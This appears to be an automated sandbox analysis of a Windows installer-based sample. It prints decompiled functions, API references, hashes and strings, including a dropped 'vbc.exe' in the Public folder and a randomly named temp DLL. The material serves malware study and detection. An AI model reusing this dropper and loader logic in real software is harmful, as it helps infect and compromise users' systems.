                                • Part of subcall function 0040534F: lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
                                • Part of subcall function 0040534F: lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
                                • Part of subcall function 0040534F: lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
                                • Part of subcall function 0040534F: SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
                                • Part of subcall function 0040534F: SendMessageA.USER32 ref: 004053E3
                                • Part of subcall function 0040534F: SendMessageA.USER32 ref: 004053FD
                                • Part of subcall function 0040534F: SendMessageA.USER32 ref: 0040540B
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                              • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp\lk95ejdjuy.dll$uvlcopdlxoed
                              • API String ID: 1941528284-3489679692
                              • Opcode ID: ebc504ea436e693e663a4b144fd74c24bb863413e05106ae1afc4e96b16114fd
                              • Instruction ID: 94ce822b9f6a6483fb8de35dc0b51f709499be211a85e0d844596cfba341e8bc
                              • Opcode Fuzzy Hash: ebc504ea436e693e663a4b144fd74c24bb863413e05106ae1afc4e96b16114fd
                              • Instruction Fuzzy Hash: 0541B931900515BACF107BB5DC45EAF7AB8DF05369B60863FF422B11E1CA7C8A528A6D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 003D0A20
                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 003D0BED
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162147549.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                              Similarity
                              • API ID: CreateFileFreeVirtual
                              • String ID:
                              • API String ID: 204039940-0
                              • Opcode ID: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
                              • Instruction ID: 960bad54558e661f087eb1e67381bf8f3a9e1ee0cdb56004758c4f99365738f9
                              • Opcode Fuzzy Hash: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
                              • Instruction Fuzzy Hash: 87A12232D04209EFDF16CFE4E885BADBBB1FF08715F20845AE515BA2A0D3749A80DB54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00405815(CHAR* _a4) {
                              				struct _SECURITY_ATTRIBUTES _v16;
                              				struct _SECURITY_DESCRIPTOR _v36;
                              				int _t22;
                              				long _t23;
                              
                              				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                              				_v36.Owner = 0x408384;
                              				_v36.Group = 0x408384;
                              				_v36.Sacl = _v36.Sacl & 0x00000000;
                              				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                              				_v16.lpSecurityDescriptor =  &_v36;
                              				_v36.Revision = 1;
                              				_v36.Control = 4;
                              				_v36.Dacl = 0x408374;
                              				_v16.nLength = 0xc;
                              				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
                              				if(_t22 != 0) {
                              					L1:
                              					return 0;
                              				}
                              				_t23 = GetLastError();
                              				if(_t23 == 0xb7) {
                              					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
                              						goto L1;
                              					}
                              					return GetLastError();
                              				}
                              				return _t23;
                              			}








                              APIs
                              • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405858
                              • GetLastError.KERNEL32 ref: 0040586C
                              • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405881
                              • GetLastError.KERNEL32 ref: 0040588B
                              Strings
                              • C:\Users\Public, xrefs: 00405815
                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040583B
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\Public
                              • API String ID: 3449924974-2845914341
                              • Opcode ID: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                              • Instruction ID: d6c2dc8a5c3265a730c97c9ba519fe28ff3708ad137b47d6a6340678ab851e8b
                              • Opcode Fuzzy Hash: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                              • Instruction Fuzzy Hash: 60011A72D00219DADF10DFA1C944BEFBBB8EF04354F04803ADA45B6290E7789658CF99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004065C3(intOrPtr _a4) {
                              				char _v292;
                              				int _t10;
                              				struct HINSTANCE__* _t14;
                              				void* _t16;
                              				void* _t21;
                              
                              				_t10 = GetSystemDirectoryA( &_v292, 0x104);
                              				if(_t10 > 0x104) {
                              					_t10 = 0;
                              				}
                              				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
                              					_t16 = 1;
                              				} else {
                              					_t16 = 0;
                              				}
                              				_t5 = _t16 + 0x40a014; // 0x5c
                              				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
                              				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
                              				return _t14;
                              			}









                              APIs
                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004065DA
                              • wsprintfA.USER32 ref: 00406613
                              • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406627
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: DirectoryLibraryLoadSystemwsprintf
                              • String ID: %s%s.dll$UXTHEME$\
                              • API String ID: 2200240437-4240819195
                              • Opcode ID: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                              • Instruction ID: 9188928b716331f4199fdf2d451d87d069fed8801fbff73d7d84d2de41a49ecb
                              • Opcode Fuzzy Hash: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                              • Instruction Fuzzy Hash: D9F0F6706006097BEB249B68ED0DFEB365CAB08304F1404BEA186E10D1EA78D8358BA9
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 60%
                              			E0040209D(void* __ebx, void* __eflags) {
                              				struct HINSTANCE__* _t18;
                              				struct HINSTANCE__* _t26;
                              				void* _t27;
                              				struct HINSTANCE__* _t30;
                              				CHAR* _t32;
                              				intOrPtr* _t33;
                              				void* _t34;
                              
                              				_t27 = __ebx;
                              				asm("sbb eax, 0x424818");
                              				 *(_t34 - 4) = 1;
                              				if(__eflags < 0) {
                              					_push(0xffffffe7);
                              					L15:
                              					E00401423();
                              					L16:
                              					 *0x4247e8 =  *0x4247e8 +  *(_t34 - 4);
                              					return 0;
                              				}
                              				_t32 = E00402BCE(0xfffffff0);
                              				 *(_t34 + 8) = E00402BCE(1);
                              				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
                              					L3:
                              					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
                              					_t30 = _t18;
                              					if(_t30 == _t27) {
                              						_push(0xfffffff6);
                              						goto L15;
                              					}
                              					L4:
                              					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                              					if(_t33 == _t27) {
                              						E0040534F(0xfffffff7,  *(_t34 + 8));
                              					} else {
                              						 *(_t34 - 4) = _t27;
                              						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
                              							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x425000, 0x40b860, "�GB"); // executed
                              						} else {
                              							E00401423( *((intOrPtr*)(_t34 - 0x20)));
                              							if( *_t33() != 0) {
                              								 *(_t34 - 4) = 1;
                              							}
                              						}
                              					}
                              					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004039DB(_t30) != 0) {
                              						FreeLibrary(_t30);
                              					}
                              					goto L16;
                              				}
                              				_t26 = GetModuleHandleA(_t32); // executed
                              				_t30 = _t26;
                              				if(_t30 != __ebx) {
                              					goto L4;
                              				}
                              				goto L3;
                              			}











                              APIs
                              • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                • Part of subcall function 0040534F: lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
                                • Part of subcall function 0040534F: lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
                                • Part of subcall function 0040534F: lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
                                • Part of subcall function 0040534F: SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
                                • Part of subcall function 0040534F: SendMessageA.USER32 ref: 004053E3
                                • Part of subcall function 0040534F: SendMessageA.USER32 ref: 004053FD
                                • Part of subcall function 0040534F: SendMessageA.USER32 ref: 0040540B
                              • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                              • GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 004020E8
                              • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,00000000,?,?,00000008,00000001,000000F0), ref: 00402152
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                              • String ID: GB
                              • API String ID: 2987980305-3285937634
                              • Opcode ID: 621d8ec26b05587c79b2cea071fc8b0623d7a7a062788e3185bb13ecc113f1ec
                              • Instruction ID: 9b57ca00f45afa7d873c5e4c93812c2e033b3b55bd6b5381131ee912067d0413
                              • Opcode Fuzzy Hash: 621d8ec26b05587c79b2cea071fc8b0623d7a7a062788e3185bb13ecc113f1ec
                              • Instruction Fuzzy Hash: EA212E32600125EBCF207FA48F49B5F76B0AF50358F20423BF211B62D0CBBC49829A5D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00405DF0(char _a4, intOrPtr _a6, CHAR* _a8) {
                              				char _t11;
                              				signed int _t12;
                              				int _t15;
                              				signed int _t17;
                              				void* _t20;
                              				CHAR* _t21;
                              
                              				_t21 = _a4;
                              				_t20 = 0x64;
                              				while(1) {
                              					_t11 =  *0x40a3ec; // 0x61736e
                              					_t20 = _t20 - 1;
                              					_a4 = _t11;
                              					_t12 = GetTickCount();
                              					_t17 = 0x1a;
                              					_a6 = _a6 + _t12 % _t17;
                              					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
                              					if(_t15 != 0) {
                              						break;
                              					}
                              					if(_t20 != 0) {
                              						continue;
                              					}
                              					 *_t21 =  *_t21 & 0x00000000;
                              					return _t15;
                              				}
                              				return _t21;
                              			}










                              APIs
                              • GetTickCount.KERNEL32(76712754,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\vbc.exe" ,0040345F,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 00405E04
                              • GetTempFileNameA.KERNEL32(?,?,00000000,?), ref: 00405E1E
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: CountFileNameTempTick
                              • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                              • API String ID: 1716503409-1498418707
                              • Opcode ID: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
                              • Instruction ID: dc9f33b0ddeab6bc99614e691558c60e13527be9603daad3520fecf5624fafc7
                              • Opcode Fuzzy Hash: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
                              • Instruction Fuzzy Hash: CAF0A7363042087BDB118F59EC45BDB7B9DDF91750F14C03BFA88DA280D6B0D9988798
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 87%
                              			E004015BB(char __ebx, void* __eflags) {
                              				void* _t13;
                              				int _t19;
                              				char _t21;
                              				void* _t22;
                              				char _t23;
                              				signed char _t24;
                              				char _t26;
                              				CHAR* _t28;
                              				char* _t32;
                              				void* _t33;
                              
                              				_t26 = __ebx;
                              				_t28 = E00402BCE(0xfffffff0);
                              				_t13 = E00405C59(_t28);
                              				_t30 = _t13;
                              				if(_t13 != __ebx) {
                              					do {
                              						_t32 = E00405BEB(_t30, 0x5c);
                              						_t21 =  *_t32;
                              						 *_t32 = _t26;
                              						 *((char*)(_t33 + 0xb)) = _t21;
                              						if(_t21 != _t26) {
                              							L5:
                              							_t22 = E00405892(_t28);
                              						} else {
                              							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
                              							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004058AF(_t39) == 0) {
                              								goto L5;
                              							} else {
                              								_t22 = E00405815(_t28); // executed
                              							}
                              						}
                              						if(_t22 != _t26) {
                              							if(_t22 != 0xb7) {
                              								L9:
                              								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                              							} else {
                              								_t24 = GetFileAttributesA(_t28); // executed
                              								if((_t24 & 0x00000010) == 0) {
                              									goto L9;
                              								}
                              							}
                              						}
                              						_t23 =  *((intOrPtr*)(_t33 + 0xb));
                              						 *_t32 = _t23;
                              						_t30 = _t32 + 1;
                              					} while (_t23 != _t26);
                              				}
                              				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
                              					_push(0xfffffff5);
                              					E00401423();
                              				} else {
                              					E00401423(0xffffffe6);
                              					E00406228("C:\\Users\\Albus\\AppData\\Local\\Temp", _t28);
                              					_t19 = SetCurrentDirectoryA(_t28); // executed
                              					if(_t19 == 0) {
                              						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                              					}
                              				}
                              				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t33 - 4));
                              				return 0;
                              			}














                              APIs
                                • Part of subcall function 00405C59: CharNextA.USER32(?), ref: 00405C67
                                • Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C6C
                                • Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C80
                              • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                • Part of subcall function 00405815: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405858
                              • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C
                              Strings
                              • C:\Users\user\AppData\Local\Temp, xrefs: 00401631
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                              • String ID: C:\Users\user\AppData\Local\Temp
                              • API String ID: 1892508949-2935972921
                              • Opcode ID: 81892e281e0bc41ed8071f99871bb6b4c6bb310ff5ad2bafd743c978d2f7bd36
                              • Instruction ID: 7f8751d3726a152fc7b031c4469f223aff892055c158b12f401dbf96511dfde3
                              • Opcode Fuzzy Hash: 81892e281e0bc41ed8071f99871bb6b4c6bb310ff5ad2bafd743c978d2f7bd36
                              • Instruction Fuzzy Hash: EC112B31208151EBDB307FA54D409BF37B0DA92714B28467FE592B22D3D63D4943962E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 99%
                              			E00406D5A() {
                              				signed int _t530;
                              				void _t537;
                              				signed int _t538;
                              				signed int _t539;
                              				unsigned short _t569;
                              				signed int _t579;
                              				signed int _t607;
                              				void* _t627;
                              				signed int _t628;
                              				signed int _t635;
                              				signed int* _t643;
                              				void* _t644;
                              
                              				L0:
                              				while(1) {
                              					L0:
                              					_t530 =  *(_t644 - 0x30);
                              					if(_t530 >= 4) {
                              					}
                              					 *(_t644 - 0x40) = 6;
                              					 *(_t644 - 0x7c) = 0x19;
                              					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                              					while(1) {
                              						L145:
                              						 *(_t644 - 0x50) = 1;
                              						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                              						while(1) {
                              							L149:
                              							if( *(_t644 - 0x48) <= 0) {
                              								goto L155;
                              							}
                              							L150:
                              							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                              							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                              							 *(_t644 - 0x54) = _t643;
                              							_t569 =  *_t643;
                              							_t635 = _t569 & 0x0000ffff;
                              							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                              							if( *(_t644 - 0xc) >= _t607) {
                              								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                              								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                              								_t628 = _t627 + 1;
                              								 *_t643 = _t569 - (_t569 >> 5);
                              								 *(_t644 - 0x50) = _t628;
                              							} else {
                              								 *(_t644 - 0x10) = _t607;
                              								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                              								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                              							}
                              							if( *(_t644 - 0x10) >= 0x1000000) {
                              								L148:
                              								_t487 = _t644 - 0x48;
                              								 *_t487 =  *(_t644 - 0x48) - 1;
                              								L149:
                              								if( *(_t644 - 0x48) <= 0) {
                              									goto L155;
                              								}
                              								goto L150;
                              							} else {
                              								L154:
                              								L146:
                              								if( *(_t644 - 0x6c) == 0) {
                              									L169:
                              									 *(_t644 - 0x88) = 0x18;
                              									L170:
                              									_t579 = 0x22;
                              									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                              									_t539 = 0;
                              									L172:
                              									return _t539;
                              								}
                              								L147:
                              								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                              								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                              								_t484 = _t644 - 0x70;
                              								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                              								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                              								goto L148;
                              							}
                              							L155:
                              							_t537 =  *(_t644 - 0x7c);
                              							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                              							while(1) {
                              								L140:
                              								 *(_t644 - 0x88) = _t537;
                              								while(1) {
                              									L1:
                              									_t538 =  *(_t644 - 0x88);
                              									if(_t538 > 0x1c) {
                              										break;
                              									}
                              									L2:
                              									switch( *((intOrPtr*)(_t538 * 4 +  &M004071C8))) {
                              										case 0:
                              											L3:
                              											if( *(_t644 - 0x6c) == 0) {
                              												goto L170;
                              											}
                              											L4:
                              											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                              											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                              											_t538 =  *( *(_t644 - 0x70));
                              											if(_t538 > 0xe1) {
                              												goto L171;
                              											}
                              											L5:
                              											_t542 = _t538 & 0x000000ff;
                              											_push(0x2d);
                              											asm("cdq");
                              											_pop(_t581);
                              											_push(9);
                              											_pop(_t582);
                              											_t638 = _t542 / _t581;
                              											_t544 = _t542 % _t581 & 0x000000ff;
                              											asm("cdq");
                              											_t633 = _t544 % _t582 & 0x000000ff;
                              											 *(_t644 - 0x3c) = _t633;
                              											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                              											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                              											_t641 = (0x300 << _t633 + _t638) + 0x736;
                              											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                              												L10:
                              												if(_t641 == 0) {
                              													L12:
                              													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                              													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                              													goto L15;
                              												} else {
                              													goto L11;
                              												}
                              												do {
                              													L11:
                              													_t641 = _t641 - 1;
                              													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                              												} while (_t641 != 0);
                              												goto L12;
                              											}
                              											L6:
                              											if( *(_t644 - 4) != 0) {
                              												GlobalFree( *(_t644 - 4));
                              											}
                              											_t538 = GlobalAlloc(0x40, 0x600); // executed
                              											 *(_t644 - 4) = _t538;
                              											if(_t538 == 0) {
                              												goto L171;
                              											} else {
                              												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                              												goto L10;
                              											}
                              										case 1:
                              											L13:
                              											__eflags =  *(_t644 - 0x6c);
                              											if( *(_t644 - 0x6c) == 0) {
                              												L157:
                              												 *(_t644 - 0x88) = 1;
                              												goto L170;
                              											}
                              											L14:
                              											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                              											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                              											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                              											_t45 = _t644 - 0x48;
                              											 *_t45 =  *(_t644 - 0x48) + 1;
                              											__eflags =  *_t45;
                              											L15:
                              											if( *(_t644 - 0x48) < 4) {
                              												goto L13;
                              											}
                              											L16:
                              											_t550 =  *(_t644 - 0x40);
                              											if(_t550 ==  *(_t644 - 0x74)) {
                              												L20:
                              												 *(_t644 - 0x48) = 5;
                              												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                              												goto L23;
                              											}
                              											L17:
                              											 *(_t644 - 0x74) = _t550;
                              											if( *(_t644 - 8) != 0) {
                              												GlobalFree( *(_t644 - 8));
                              											}
                              											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                              											 *(_t644 - 8) = _t538;
                              											if(_t538 == 0) {
                              												goto L171;
                              											} else {
                              												goto L20;
                              											}
                              										case 2:
                              											L24:
                              											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                              											 *(_t644 - 0x84) = 6;
                              											 *(_t644 - 0x4c) = _t557;
                              											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                              											goto L132;
                              										case 3:
                              											L21:
                              											__eflags =  *(_t644 - 0x6c);
                              											if( *(_t644 - 0x6c) == 0) {
                              												L158:
                              												 *(_t644 - 0x88) = 3;
                              												goto L170;
                              											}
                              											L22:
                              											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                              											_t67 = _t644 - 0x70;
                              											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                              											__eflags =  *_t67;
                              											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                              											L23:
                              											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                              											if( *(_t644 - 0x48) != 0) {
                              												goto L21;
                              											}
                              											goto L24;
                              										case 4:
                              											L133:
                              											_t559 =  *_t642;
                              											_t626 = _t559 & 0x0000ffff;
                              											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                              											if( *(_t644 - 0xc) >= _t596) {
                              												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                              												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                              												 *(_t644 - 0x40) = 1;
                              												_t560 = _t559 - (_t559 >> 5);
                              												__eflags = _t560;
                              												 *_t642 = _t560;
                              											} else {
                              												 *(_t644 - 0x10) = _t596;
                              												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                              												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                              											}
                              											if( *(_t644 - 0x10) >= 0x1000000) {
                              												goto L139;
                              											} else {
                              												goto L137;
                              											}
                              										case 5:
                              											L137:
                              											if( *(_t644 - 0x6c) == 0) {
                              												L168:
                              												 *(_t644 - 0x88) = 5;
                              												goto L170;
                              											}
                              											L138:
                              											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                              											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                              											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                              											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                              											L139:
                              											_t537 =  *(_t644 - 0x84);
                              											L140:
                              											 *(_t644 - 0x88) = _t537;
                              											goto L1;
                              										case 6:
                              											L25:
                              											__edx = 0;
                              											__eflags =  *(__ebp - 0x40);
                              											if( *(__ebp - 0x40) != 0) {
                              												L36:
                              												__eax =  *(__ebp - 4);
                              												__ecx =  *(__ebp - 0x38);
                              												 *(__ebp - 0x34) = 1;
                              												 *(__ebp - 0x84) = 7;
                              												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                              												goto L132;
                              											}
                              											L26:
                              											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                              											__esi =  *(__ebp - 0x60);
                              											__cl = 8;
                              											__cl = 8 -  *(__ebp - 0x3c);
                              											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                              											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
